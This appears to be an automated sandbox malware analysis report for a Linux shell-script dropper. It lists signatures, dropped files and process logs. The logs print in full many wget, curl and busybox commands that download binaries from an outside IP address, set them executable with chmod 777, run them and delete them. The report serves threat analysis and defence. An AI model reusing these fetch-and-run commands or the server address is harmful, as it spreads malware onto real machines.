Malware Analysis Report

2025-05-28 20:51

Sample ID 241021-b4x4watgpk
Target c2023304dbd5db2b900e527622714d277b218d0aff1fc1dcb1cff60cb8dbdc6b.sh
SHA256 c2023304dbd5db2b900e527622714d277b218d0aff1fc1dcb1cff60cb8dbdc6b
Tags
defense_evasion antivm discovery
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

c2023304dbd5db2b900e527622714d277b218d0aff1fc1dcb1cff60cb8dbdc6b

Threat Level: Shows suspicious behavior

The file c2023304dbd5db2b900e527622714d277b218d0aff1fc1dcb1cff60cb8dbdc6b.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion antivm discovery

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-21 01:42

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-21 01:42

Reported

2024-10-21 01:45

Platform

ubuntu1804-amd64-20240729-en

Max time kernel

13s

Max time network

130s

Command Line

[/tmp/c2023304dbd5db2b900e527622714d277b218d0aff1fc1dcb1cff60cb8dbdc6b.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i /tmp/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i N/A
N/A /tmp/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm /tmp/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm N/A
N/A /tmp/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA /tmp/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA N/A
N/A /tmp/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw /tmp/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw N/A
N/A /tmp/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb /tmp/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb N/A
N/A /tmp/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k /tmp/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k N/A
N/A /tmp/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613 /tmp/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613 N/A
N/A /tmp/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp /tmp/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp N/A
N/A /tmp/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2 /tmp/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2 N/A
N/A /tmp/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY /tmp/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY N/A
N/A /tmp/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck /tmp/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck N/A
N/A /tmp/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG /tmp/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG N/A
N/A /tmp/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv /tmp/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv N/A
N/A /tmp/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah /tmp/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah N/A
N/A /tmp/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2 /tmp/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2 N/A
N/A /tmp/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY /tmp/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY N/A
N/A /tmp/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck /tmp/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck N/A
N/A /tmp/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG /tmp/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG N/A
N/A /tmp/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv /tmp/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv N/A
N/A /tmp/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah /tmp/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah N/A
N/A /tmp/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i /tmp/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i N/A
N/A /tmp/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm /tmp/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm N/A
N/A /tmp/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA /tmp/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA N/A
N/A /tmp/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw /tmp/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw N/A
N/A /tmp/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb /tmp/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb N/A
N/A /tmp/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k /tmp/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k N/A
N/A /tmp/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613 /tmp/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613 N/A
N/A /tmp/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp /tmp/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah /usr/bin/curl N/A
File opened for modification /tmp/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i /usr/bin/curl N/A
File opened for modification /tmp/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA /usr/bin/curl N/A
File opened for modification /tmp/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG /usr/bin/curl N/A
File opened for modification /tmp/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah /usr/bin/curl N/A
File opened for modification /tmp/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb /usr/bin/curl N/A
File opened for modification /tmp/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG /usr/bin/curl N/A
File opened for modification /tmp/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA /usr/bin/curl N/A
File opened for modification /tmp/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm /usr/bin/curl N/A
File opened for modification /tmp/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k /usr/bin/curl N/A
File opened for modification /tmp/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck /usr/bin/curl N/A
File opened for modification /tmp/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb /usr/bin/curl N/A
File opened for modification /tmp/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp /usr/bin/curl N/A
File opened for modification /tmp/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i /usr/bin/curl N/A
File opened for modification /tmp/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw /usr/bin/curl N/A
File opened for modification /tmp/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp /usr/bin/curl N/A
File opened for modification /tmp/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw /usr/bin/curl N/A
File opened for modification /tmp/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY /usr/bin/curl N/A
File opened for modification /tmp/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv /usr/bin/curl N/A
File opened for modification /tmp/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613 /usr/bin/curl N/A
File opened for modification /tmp/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY /usr/bin/curl N/A
File opened for modification /tmp/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck /usr/bin/curl N/A
File opened for modification /tmp/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv /usr/bin/curl N/A
File opened for modification /tmp/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k /usr/bin/curl N/A
File opened for modification /tmp/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2 /usr/bin/curl N/A
File opened for modification /tmp/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613 /usr/bin/curl N/A
File opened for modification /tmp/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2 /usr/bin/curl N/A
File opened for modification /tmp/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm /usr/bin/curl N/A

Processes

/tmp/c2023304dbd5db2b900e527622714d277b218d0aff1fc1dcb1cff60cb8dbdc6b.sh

[/tmp/c2023304dbd5db2b900e527622714d277b218d0aff1fc1dcb1cff60cb8dbdc6b.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.126.196/bins/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i]

/bin/chmod

[chmod 777 RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i]

/tmp/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i

[./RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i]

/bin/rm

[rm RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i]

/usr/bin/wget

[wget http://87.120.126.196/bins/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm]

/bin/chmod

[chmod 777 Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm]

/tmp/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm

[./Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm]

/bin/rm

[rm Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm]

/usr/bin/wget

[wget http://87.120.126.196/bins/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA]

/bin/chmod

[chmod 777 CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA]

/tmp/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA

[./CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA]

/bin/rm

[rm CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA]

/usr/bin/wget

[wget http://87.120.126.196/bins/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw]

/bin/chmod

[chmod 777 oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw]

/tmp/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw

[./oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw]

/bin/rm

[rm oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw]

/usr/bin/wget

[wget http://87.120.126.196/bins/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb]

/bin/chmod

[chmod 777 OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb]

/tmp/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb

[./OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb]

/bin/rm

[rm OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb]

/usr/bin/wget

[wget http://87.120.126.196/bins/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k]

/bin/chmod

[chmod 777 aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k]

/tmp/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k

[./aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k]

/bin/rm

[rm aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k]

/usr/bin/wget

[wget http://87.120.126.196/bins/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613]

/bin/chmod

[chmod 777 Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613]

/tmp/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613

[./Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613]

/bin/rm

[rm Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613]

/usr/bin/wget

[wget http://87.120.126.196/bins/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp]

/bin/chmod

[chmod 777 HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp]

/tmp/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp

[./HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp]

/bin/rm

[rm HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp]

/usr/bin/wget

[wget http://87.120.126.196/bins/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2]

/bin/chmod

[chmod 777 tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2]

/tmp/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2

[./tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2]

/bin/rm

[rm tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2]

/usr/bin/wget

[wget http://87.120.126.196/bins/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY]

/bin/chmod

[chmod 777 6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY]

/tmp/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY

[./6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY]

/bin/rm

[rm 6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY]

/usr/bin/wget

[wget http://87.120.126.196/bins/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck]

/bin/chmod

[chmod 777 7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck]

/tmp/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck

[./7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck]

/bin/rm

[rm 7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck]

/usr/bin/wget

[wget http://87.120.126.196/bins/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG]

/bin/chmod

[chmod 777 SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG]

/tmp/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG

[./SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG]

/bin/rm

[rm SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG]

/usr/bin/wget

[wget http://87.120.126.196/bins/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv]

/bin/chmod

[chmod 777 tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv]

/tmp/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv

[./tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv]

/bin/rm

[rm tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv]

/usr/bin/wget

[wget http://87.120.126.196/bins/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah]

/bin/chmod

[chmod 777 KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah]

/tmp/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah

[./KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah]

/bin/rm

[rm KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah]

/usr/bin/wget

[wget http://87.120.126.196/bins/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2]

/bin/chmod

[chmod 777 tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2]

/tmp/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2

[./tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2]

/bin/rm

[rm tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2]

/usr/bin/wget

[wget http://87.120.126.196/bins/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY]

/bin/chmod

[chmod 777 6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY]

/tmp/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY

[./6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY]

/bin/rm

[rm 6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY]

/usr/bin/wget

[wget http://87.120.126.196/bins/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck]

/bin/chmod

[chmod 777 7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck]

/tmp/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck

[./7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck]

/bin/rm

[rm 7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck]

/usr/bin/wget

[wget http://87.120.126.196/bins/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG]

/bin/chmod

[chmod 777 SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG]

/tmp/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG

[./SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG]

/bin/rm

[rm SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG]

/usr/bin/wget

[wget http://87.120.126.196/bins/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv]

/bin/chmod

[chmod 777 tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv]

/tmp/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv

[./tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv]

/bin/rm

[rm tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv]

/usr/bin/wget

[wget http://87.120.126.196/bins/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah]

/bin/chmod

[chmod 777 KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah]

/tmp/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah

[./KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah]

/bin/rm

[rm KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah]

/usr/bin/wget

[wget http://87.120.126.196/bins/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i]

/bin/chmod

[chmod 777 RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i]

/tmp/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i

[./RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i]

/bin/rm

[rm RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i]

/usr/bin/wget

[wget http://87.120.126.196/bins/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm]

/bin/chmod

[chmod 777 Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm]

/tmp/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm

[./Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm]

/bin/rm

[rm Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm]

/usr/bin/wget

[wget http://87.120.126.196/bins/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA]

/bin/chmod

[chmod 777 CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA]

/tmp/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA

[./CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA]

/bin/rm

[rm CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA]

/usr/bin/wget

[wget http://87.120.126.196/bins/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw]

/bin/chmod

[chmod 777 oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw]

/tmp/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw

[./oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw]

/bin/rm

[rm oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw]

/usr/bin/wget

[wget http://87.120.126.196/bins/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb]

/bin/chmod

[chmod 777 OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb]

/tmp/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb

[./OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb]

/bin/rm

[rm OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb]

/usr/bin/wget

[wget http://87.120.126.196/bins/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k]

/bin/chmod

[chmod 777 aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k]

/tmp/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k

[./aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k]

/bin/rm

[rm aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k]

/usr/bin/wget

[wget http://87.120.126.196/bins/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613]

/bin/chmod

[chmod 777 Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613]

/tmp/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613

